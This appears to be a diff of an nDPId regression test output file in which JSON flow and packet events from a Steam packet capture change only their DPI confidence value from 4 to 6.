00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1357332164787,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164787,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LvAqLyVUatzCLJhaYsALBktVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1357332164787,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164787,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qjAqLyVRRyRqrJhaYkALAccVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1357332164823,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164823,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWScAAIARjXlFHJGqwKi8lWmJsmEANPbVVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA7fJcQrwAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1357332164834,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164834,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSgAAIARxIxEjlskwKi8lWmJsmEANPCBVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAzHF5K\/4AAAA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1357332164836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164836,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx7AqLyVkkKYDrJhaYsALLOPVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1357332164836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164836,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNw\/AqLyVSKU9u7JhaYoALFeBVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1357332164837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164837,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qbAqLyVRRyRrLJhaYkALAcaVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1357332164837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164837,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L3AqLyVUatzBrJhaYsALBkvVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1357332164869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164869,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSkAAIARjXVFHJGswKi8lWmJsmEANAokVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAumV7f70AAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1357332164873,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164873,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSoAAIAR3dxIpT27wKi8lWmKsmEANMZ2VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAjNtWHqQAAAA="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1357332164876,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164876,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSsAAIAROeySQpgNwKi8lWmKsmEANDIHVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAhmUJFOgAAAA="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164886,"flow_last_seen":1357332164886,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164886,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1357332164886,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164886,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARHb\/AqLyVRI5bIrJhaYkALD4yVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164886,"flow_last_seen":1357332164886,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164886,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164886,"flow_last_seen":1357332164886,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164886,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164887,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1357332164887,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164887,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAROR3AqLyVy025BLJhaYkALFmQVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164887,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164887,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1357332164888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164888,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARBC7AqLyVRI50s7JhaYkALCShVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1357332164888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164888,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNw7AqLyVSKU9vLJhaYkALFeBVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1357332164892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164892,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSwAAIAROeySQpgMwKi8lWmLsmEANKu+VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAMlh+aU0BAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1357332164912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164912,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWS0AAIARqvhEjnSzwKi8lWmJsmEANEAeVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAHUr6J8MAAAA="} 